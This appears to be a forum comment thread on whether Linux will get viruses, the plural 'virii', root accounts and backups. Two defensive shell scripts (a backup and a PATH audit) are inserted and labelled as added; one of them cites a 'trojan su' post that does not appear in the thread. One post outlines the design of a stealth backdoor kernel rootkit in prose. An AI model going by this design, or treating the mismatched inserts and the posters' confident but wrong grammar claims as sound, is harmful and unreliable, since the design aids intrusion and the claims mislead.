I don't believe that my box will ever be infected with a virus since Linux is very secure and I control every file by myself. But let's continue to my main point I want to bring up: if, and there's a chance, that there will be a virus for Linux, anti-virus programs will be written so quickly, because most Linux users have a background in programming, or they are programmers themselves. And just as Linux was developed by hackers, if its anti-virus is also developed by hackers, no anti-virus from the Windows platform would compare to it. Same with exploits: as a security hole is found on Linux, an exploit will be written quickly, and a fix will be written even faster, and will secure your system 100%. But still, I don't think there's a reason to be afraid of viruses for Linux.
Dan.
Hackers, way back when (probably during the mid-80s), started (erroneously) using the plural "virii" for computer viruses, and it became "correct" through years of use. This is similar to the situation with "octopus." Technically, the plural of "octopus" is "octopoda," not "octopi." This owes to the fact that "octopus" isn't Latin, but Greek ("octo" = 8, "pus" = foot.) But, folks have been (erroneously) using "octopi" for so long that it has become correct.
Just a little factoid to help you in Trivial Pursuit.
Much Love,
"S"HM
*****
(I refuse to spellcheck out of contempt for your belief system)
And "virii" is pretentious h@k3r t0k. Stick to English plurals if you can't rattle off all five Latin declensions in each of three genders, plus irregulars.
Me can say somethun lotsa timez, d00zersmartz, but that's not sufficient to make it "correct".
What a bunch of clowns. Go back to take those classes you skipped.
Of course, the obvious response is to run MS Office as root... in a chroot jail! It will be worth the hassles to have the obvious desktop icon.
For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
How do most virii work? The big headliner virii always seem to be written to exploit certain flaws or features in software. The reason that these flaws can be taken advantage of seems to be twofold:
So, I'm not going to argue for or against Linux per se, but I think open source software really does defeat the above points most of the time.
The other point that has been raised by many others in this discussion is the intrinsic multiuser aspect of Linux. The fact that a multiuser environment is all but mandatory with Linux makes people follow rules for access and privileges on a system, which is great for stopping virii from propagating via privileged access. Sure, Windows (among others) may provide the ability to function semi-multiuser but it's not nearly as enforced as on Linux, which means people can get lazy and run everything under a privileged account. So Linux isn't necessarily better at being secure (don't hit me hehehe), but it is better at training people to be more secure. I'm sure if programmers and users of Windows based systems had enforced access/security in a multiuser system then Windows security holes would be patched much quicker, especially in the application layer. Programmers simply wouldn't be able to assume that their programs had complete access to the system - they would have to write checks into their code to make sure of it, and users would have to enable access for programs that required privileged access. That might take a little bit longer for users to install/run programs, but it's much better than the current "double-click suck it and see" method where you've got NFI how to restrict what a single program can access on your system.
-------------------------------------------------
email
email me or not.
Me can say somethun lotsa timez, d00zersmartz, but that's not sufficient to make it "correct".
So what makes a piece of language (or any other quasi-standard, for that matter) correct if not popular support? Maybe English teachers all over the US get together once a year and decide what is and is not correct English, right? I know, I know-- such a symposium is entirely unnecessary: we have the ACs to hand down the absolute, final word on the right way to do things. It's really weird that so many folks who know everything won't sign their name to their divine declarations.
Much Love,
"S"HM
*****
(I refuse to spellcheck out of contempt for your belief system)
I didn't realize until the above comment got moderated as such - oh well, here goes!
My understanding is that their Lisp implementation has enough security built in to avoid the problem...
:-)
Cheers,
Ben
My usual seat in the cluetrain is at http://pub4.ezboard.com/biwethey.ht
I'm all for the evolution of language, but English usage is determined by usage over time by published sources. Magazines, newspapers, books, etc. They've all accepted "octopi", and almost all have given up on "these data", but all credible publications I know of (newspapers, books, magazines) still use "viruses" only, so it is too soon to call virii "accepted".
Isn't that where the uberdistro, LinuxOne is supposed to be making inroads?
In other news, I have just received some disturbing information. It appears that the champions of Free Speech (TM) and Open Source may be hypocrites.
First, I appreciate the contribution of source code for Slash, but am disturbed that "its a lower priority to me than it ought to be." The source code is heinously out of date, and I can't see why it has yet to see as much as a snapshot posted of a more updated version.
Second, even more disturbing, is the gag order that has just been brought to my attention. As the story goes (I am going only by what I am told from the other person involved), an acquaintance of mine has recently been sent an email in which CmdrTaco himself has ordered the aforementioned acquaintance to refrain from posting. Furthermore, the letter allegedly contains a threat of banning an entire network's access to the entire Slashdot site. I am reminded of various sources, not the least of which is the Bible, which contain the same sentiment as Sir William Blackstone when he rightfully stated that "it is better that ten guilty persons escape than that one innocent suffer."
Sorry for the off topic, but, like a fascist dictatorship, there is no area where one may openly post his or her view of the regime.
"Virii" is a good usage, here, primarily because it has a history in Geek culture. The fact of it being both a pretentious and incorrect usage says something important about the difference between a hacker and a cracker, and speaks volumes of the awkward self-consciousness that is our badge and shackles. The difference between "viruses" and "virii" is thus meaningful-- it encapsulates a subtle cultural/historical lesson about late 20th Century Nerddom.
Much Love,
"S"HM
*****
(I refuse to spellcheck out of contempt for your belief system)
In a class called "Computer and Network Security" taught by Ron Rivest, a group of students did an interesting project on how one might completely destroy the security of a Linux machine. To wit:
One could write a kernel module that doesn't allow itself to be listed with lsmod. It even steps on certain system calls so that the file containing it doesn't get listed with ls. It also adds itself to several key executables but alters the system calls so that the file sizes don't appear to change. It provides a backdoor that allows a cracker to own the machine remotely, and disables any kind of logging that would result from the cracker's actions. This module could be sent through any kind of buggy network daemon, and spread like a worm. The machine's admin would have a hell of a time even discovering that the machine was infected! It seems that running a virus in kernel space gives you significantly more power than even running it as root.
Of course, the students didn't implement this virus/trojan/worm - it would require some crazy skillz, but they really had their bases covered when it came to design.
It should be noted that this kind of thing could probably be pulled off on many different types of operating systems, and might be even more successful since commercial systems have more homogeneous kernels (I can imagine all kinds of "unresolved symbol" errors with all the custom Linux kernels out there...)
Please.. the plural of "virus" is NOT "virii". It seems that very few experts in the field of computer viruses really call them "virii", the term seems to have come from "script kiddies". At least, AFAIK. If anyone knows differently, please tell me, I'd really like to know if I'm wrong here..
Sorry, it's one of my pet peeves.
Backup-- You did back up his files didn't you? Perhaps a cron script that tar-bzips all files from a users home directory into an area with a different user ID would be useful in linux distributions.
Hey, that's funny. Your sig is almost exactly the same as my infoline on IRC, which is . :D
-emufreak
The original plague was trojans but they died quickly from being easy to track down...
:)
Linux viruses would be akin to DOS trojans.. easy to track down.. there is a REASON why *nix has a serious trojan problem and virtually no virus problem while Windows has exactly the reverse..
While trojans can be tracked down easily, *nix viri need root access.. Many users prefer to download source code.. true SOME go for binaries...
Also, in order for viri to move from system to system a binary has to find its way from a victim machine to a new victim.. Since users can download binaries from the original author or from a "trusted source" or a mirror of same, the exposure is limited.
Back in the good old BBS days you downloaded from BBSes.. the binary on the BBS is unlikely to have come directly from the author but may have changed hands. The chance of it having passed through an infected computer is reasonable. The infected user will disinfect his system but the virus will remain on the BBS lying in wait for a new victim.
Since users now download from a reasonably secure source the chance of the virus spreading is reduced considerably. This is true for Windows and *nix. Not vanished, but it does make tracking down and permanently terminating a virus a likely event.
Archives nowadays tend to contain source, so if a user wants a binary they may have to go to the original author.
Finally, if you do try to run software as root many applications issue scary warnings about doing so. If more programmers did this that would be enough to keep any newbie from trying to run stuff as root.
This doesn't completely eliminate viruses.. Viruses can (and as Linux grows in popularity WILL) attempt to use defects in Linux security to gain root. As this happens the defects will be repaired. Some viruses will attempt brute force attacks and Linux will be modified to detect such attempts and KILL the offending code.. and leave a user e-mail saying "Virus in
Basically viruses in Linux will exist but have a short lifespan and difficulty spreading in the first place. Windows will also face these problems.
Instead of worse viruses for Linux I see more efforts to exploit Windows defects as Microsoft seems less interested in fixing them. More e-mail viruses...
I also see attack programs phasing out viruses.. The reasoning is once trojans could seriously cripple whole groups of users.. not anymore.. they are easily caught and destroyed... viruses replaced them as viruses can not be easily caught but now viruses can be thwarted and tracked down, attack programs run on the offending user's machine isolated from any anti-whatever software...
It also gives the attacker that personal feel.. he can keep a body count. A virus in the wild is untraceable even by the author. He only knows of his success from newsgroups... if his virus dies he may never know what went wrong.
Just my opinion... and of course.. I could be wrong... but that's always true
I don't actually exist.
I think some of these companies would not like seeing reliable free software hit the mainstream because that would destroy their market.
One more reason not to use commercial, closed source software in the first place.
A program run amok can fill up your entire drive, rather than just its partitions. It increases the likelihood that files used together might be on widely different areas of the disk; increasing access time.
Now that you have a system in place and can make some estimates on the amount of disk space used, back it all up onto tape, repartition the disk, and restore.
And if you don't have a tape drive or other backup media, get one. You'll need it anyway.
Uhh, okay, backup is a last resort, at best, against data loss, you prefer this not to happen at all, so get the backup stuff out of your head. Each lost file amounts to 2.5x the amount to recreate the file, with no backup, which is really kind of silly for a huge (hell, even small-large) corporation to do on all their machines. They usually save all files on a network drive, anyway.
Okay, but how about this. Assume a desktop machine with *enough* hard drive space, once a day, at about, say, 5 am or some absurdly strange time for the user to be working, a cron script is started with a cp /usr/* /root/backup or however the syntax goes (I lost my linux partition and I haven't bothered to get it back, and I'm still a newbie, so). I'm sure the files could be copied to a network drive for a "better" (tape, CD-R, whatever) backup method.
I mean, windows doesn't work this way, but if all the users made sure to plop their docs in "c:\My Documents" a similar windows script could be made (using scheduler and a batch file is how I would do it).
I still think prevention is better, I mean, I don't want the bank robbed every day just because of FDIC insurance or my car broken into because the insurance company will pay for it, ya know?
later
Dan
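A cron-driven snapshot along the lines proposed in the two posts above (tar the home directory into an area owned by a different user, restore as root) as an added example; it is not code from either poster. The /var/backups/home path and the root crontab line in the comments are assumptions, gzip stands in for bzip2, and the demo uses temporary directories so it runs without root.

```shell
#!/bin/sh
# Added example, not code from the thread: a nightly snapshot of one user's
# home directory into an area owned by a different UID, plus a restore helper.
# Assumed deployment (not from the thread): run from root's crontab, e.g.
#   0 5 * * * /usr/local/sbin/snapshot_home.sh /home/alice /var/backups/home
# with /var/backups/home mode 0700 and owned by root (or a dedicated backup
# user), so a process running as the user can neither read nor alter old
# snapshots. gzip is used instead of bzip2 so the demo runs wherever tar does.

# snapshot_home HOME_DIR DEST_DIR [KEEP]
# Writes DEST_DIR/<user>-<stamp>.tar.gz, keeps only the newest KEEP archives
# for that user (default 7), prints the archive path, and returns non-zero on
# any failure, including an archive that does not read back cleanly.
snapshot_home() {
    _src=$1; _dest=$2; _keep=${3:-7}
    [ -d "$_src" ] || { echo "snapshot_home: no such home: $_src" >&2; return 1; }
    [ -d "$_dest" ] || { echo "snapshot_home: no such dest: $_dest" >&2; return 1; }
    _name=$(basename "$_src")
    _out="$_dest/$_name-$(date +%Y%m%d-%H%M%S).tar.gz"
    # Archive relative to the parent directory so a restore recreates
    # <parent>/<user>/... instead of absolute paths.
    tar -C "$(dirname "$_src")" -czf "$_out" "$_name" || { rm -f "$_out"; return 1; }
    # Read the archive back before trusting it.
    tar -tzf "$_out" >/dev/null || { rm -f "$_out"; return 1; }
    # Prune: newest first, drop everything past the KEEP-th entry.
    ls -1t "$_dest/$_name"-*.tar.gz 2>/dev/null | tail -n +"$((_keep + 1))" |
        while IFS= read -r _old; do rm -f "$_old"; done
    echo "$_out"
}

# restore_home ARCHIVE PARENT_DIR
# Unpacks ARCHIVE under PARENT_DIR (e.g. /home); meant to be run as root on a
# known-clean system after the damaged home directory has been removed.
restore_home() {
    [ -f "$1" ] || { echo "restore_home: no such archive: $1" >&2; return 1; }
    [ -d "$2" ] || { echo "restore_home: no such dir: $2" >&2; return 1; }
    tar -C "$2" -xzf "$1"
}

# Demo with constructed data in a temp dir: snapshot, wipe the home, restore.
demo_dir=$(mktemp -d)
mkdir -p "$demo_dir/home/alice" "$demo_dir/backups"
echo "chapter one" > "$demo_dir/home/alice/novel.txt"
archive=$(snapshot_home "$demo_dir/home/alice" "$demo_dir/backups") &&
    echo "wrote $archive" &&
    rm -rf "$demo_dir/home/alice" &&
    restore_home "$archive" "$demo_dir/home" &&
    echo "restored: $(cat "$demo_dir/home/alice/novel.txt")"
rm -rf "$demo_dir"
```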
until MS proved them that it was possible to catch a virus through email.
Over the last few years, the terms hacker and cracker have tended to merge in the minds of the public ( to the disgust of both hackers *and* crackers ), so arguably, a new term is needed.
My suggestion is : how about 'Quacker'?
Quacker : an individual who uses their computer for intentionally malicious and/or destructive activities, as opposed to hackers ( who love to write code ) or crackers ( who love to test system security ).
While we are at it, we could also start 'Quack' magazine, as a parody of Phrack. My main problem with most "script kiddies" is that they take themselves way too seriously.
[Elmer Fudd mode]
"He, he, he. You wascally compooter quackers! Don't you know it's quacker hunting season!"
[/Elmer Fudd mode]
Just another mindless attempt at humor.
Firstly, the plural of the English word 'virus' can only possibly be 'viruses'. In English, -us words derived from Latin form the plural by appending -es, and -us words derived from Greek form the plural by exchanging -us for -i.
However, the Latin word 'virus' (from which the English 'virus' is derived) is not subject to English pluralisation rules.
There is a lot of doubt on the issue of the Latin plural because:
i) Latin 'virus' was a mass noun, meaning 'some poison', so was never actually used as a plural.
ii) in Latin, the same word can have different plurals depending on its usage. (This is where the terms 'genitive', 'accusative' etc. come in).
iii) It's thousands of years since the language was natively spoken anyway; and in those days no-one cared about standardisation of the language, so who the hell knows what it should have been!
(It is also relevant that using a Latin plural in English for 'virus' is inappropriate, as the Latin meaning of 'virus' is different to the English meaning of the word).
Notwithstanding the three reasons just given, there are a few tries at forming a Latin plural for 'virus', each of which is arrived at by applying 'rules' of Latin grammar which were deduced by reading ancient works (which had fairly loose grammar anyway).
i) virii. Note that this is viri with a macron over the 'i' (indicating long vowel sound), and not a diphthong as in English. It is in fact pronounced like the English word 'wiry' (just to confuse things more). Similar Latin nouns occur in the 'troll' that I am replying to.
ii) virora, vire, viruus. These come from attempting to classify 'virus' as a different declension ('declension' is the technical term for what sort of noun a noun is, for the purposes of pluralisation; there are five groups), and applying that declension's pluralisation rule. Note that the 'uu' in 'viruus' is a long vowel sound, like the 'ii' in 'virii'.
Conclusion: when writing English, use the English plural 'viruses'. When writing Latin, you will never need a plural of the word.
Linux, where you get more Geek Chic for finding the bug than exploiting it.
Viruses are on the way, and will most likely be even more attractive for Linux than WinXX. By writing a WinXX virus, I have to fool a virus checker, and even then I can generally only affect the clients of an organization. And if you have the "." in your path?? You're a great target. Plus, I can just start taking out your linux machines, your print servers, your databases, have a trojan report back keystrokes and network stats until it blows up?? Doable. And the virus will most likely not be open source.
Plus, what about companies like Norton?? I have this sneaking suspicion that they actually create some of these viruses, both to increase the value of their own product, and to devalue the product of a competitor. (You'd be surprised at the viruses I've seen that only one virus checker can find when they all have updated defs.) I know that this delves into the realm of conspiracy theory, but if there's a Dr. Solomon's for linux, there will have to be a virus for it to find. And if linux gets a good mindshare....
P.S. I wrote quite a bit of Unix virii back in the day, and it ain't that difficult.
Just My 0.02
Jason
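The trojan su described earlier in the thread and the "." in the path mentioned in this post both depend on the shell searching a user-writable directory before the system ones. The following check is an added example, not code from any poster: it audits a PATH value for such entries; the PATH string and home directory in the demo are constructed.

```shell
#!/bin/sh
# Added example, not code from the thread: audit a PATH for directories in
# which an ordinary process could plant a look-alike "su" that the shell finds
# before the real one. The checks are string tests on a PATH value, so they run
# offline; only other_writable looks at the disk, and only for dirs that exist.

# other_writable DIR -> returns 0 if "others" have write permission on DIR
other_writable() {
    [ -d "$1" ] || return 1
    # 9th character of the mode string is the other-write bit ("w" or "-");
    # -L follows symlinks so a link's own lrwxrwxrwx mode is not reported.
    case "$(ls -ldL "$1" 2>/dev/null | cut -c9)" in
        w) return 0 ;;
        *) return 1 ;;
    esac
}

# path_audit PATH_VALUE HOME_DIR
# Prints one "RISK:" line per suspicious entry, in PATH order, noting whether
# it is searched before the first system directory. Returns 1 if anything was
# flagged, 0 if the PATH looked clean.
path_audit() {
    _path=$1; _home=$2; _rc=0; _pos=0; _seen_system=0
    # An empty field (leading, trailing or "::") silently means "."
    case "$_path" in
        :*|*:|*::*) echo "RISK: empty element in PATH means current directory"; _rc=1 ;;
    esac
    _old_ifs=$IFS; IFS=:
    for _dir in $_path; do
        _pos=$((_pos + 1))
        _why=""
        if [ -n "$_dir" ]; then
            case "$_dir" in
                /bin|/usr/bin|/sbin|/usr/sbin) _seen_system=1 ;;
                .|./*) _why="resolves to the current directory" ;;
                /*) ;;
                *) _why="relative entry, resolves under the current directory" ;;
            esac
            if [ -n "$_home" ]; then
                case "$_dir" in
                    "$_home"|"$_home"/*) _why="under HOME, writable by the user" ;;
                esac
            fi
            if [ -z "$_why" ] && other_writable "$_dir"; then
                _why="directory is world-writable"
            fi
            if [ -n "$_why" ]; then
                if [ "$_seen_system" -eq 0 ]; then
                    echo "RISK: #$_pos $_dir: $_why (searched BEFORE the system dirs)"
                else
                    echo "RISK: #$_pos $_dir: $_why"
                fi
                _rc=1
            fi
        fi
    done
    IFS=$_old_ifs
    return $_rc
}

# Demo on a constructed PATH: a bin dir under HOME ahead of the system dirs,
# plus a trailing empty element.
if path_audit "/home/alice/bin:/usr/bin:/bin:" /home/alice; then
    echo "PATH looks clean"
else
    echo "entries flagged; put user-writable dirs after the system dirs, or drop them"
fi
```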
A computer savvy person does not run a linux box as root, or a NT box as administrator.
A computer savvy person uses an upgraded anti virus program and keeps track of discovered bugs and security flaws.
A computer savvy person knows that bad things happen sooner or later and backs up data.
However, Linux is slowly entering the realm of the non-geeks.
They will run their system as preinstalled.
They will not update their system when a bug is discovered (and fixed)
They will run as root if it saves them the trouble of remembering *two* passwords.
Hey, these are the people who have their password on a post it note beside the screen!
Security in an open source system works because the user is co-responsible for the system
Windows' main security problem is that it is designed to fit both the clueless and the pro.
Now for the big question:
How can "we" avoid that Linux falls into the same trap? Is it better that Linux remains an OS for the pros, or is it possible to make a secure "install and forget" open source system?
All opinions are my own - until criticized
well, I don't know what version of RH you're running, but the easiest way for 6.1 (which, as far as I'm concerned, is really the first release that I really like) is this:
$ su
Password: *******
# linuxconf
:)
from here, try Config | Networking | Client Tasks | PPP/SLIP/PLIP
it's VERY easy to set up from there -- even on my laptop, where the modem changes frequently, as well as the area code and ISP.
if you run gnome, you'll notice that in [BIGFOOT] | Panel | Add Applet | Network there is something called Modem Lights. click on the little button. it dials for ANY user if the check box is checked in linuxconf.
hope this helps.
Lea
I wasn't talking about friends having root access! I wasn't talking about any virus altering the partition table! I was talking about if a virus is run in dos or from the mbr or wherever it can put files in a linux filesystem regardless of whatever passwords or whatever you have.
This is damned obvious. At this stage THE KERNEL HASN'T STARTED YET!!!
Will people stop assuming that people who say "unpopular" things (like a linux machine can be compromised with a big enough sledgehammer) are pig ignorant newbies (which I'm NOT)
And it was really funny. I wonder how many people (newbies) had to reboot after that :^D
With the amount of complaining and nagging I have seen coming from the general LiNUX population in the last few months, a few virii don't look like that much of a bad thing to have.
I am sure I am no better for complaining about it myself but I am sick of hearing about the crap that is circulating. So much for the rules of advocacy!!!
p.s: it is my understanding that the plural form for anything of latin origin ending in s is converted to i. eg cactus = cactii. (thought it was worth the note =0)
---------------------------------
Better watch out for that penguin. I've heard he smashes windows.
Wrong. Octopi is not a word. Get a clue.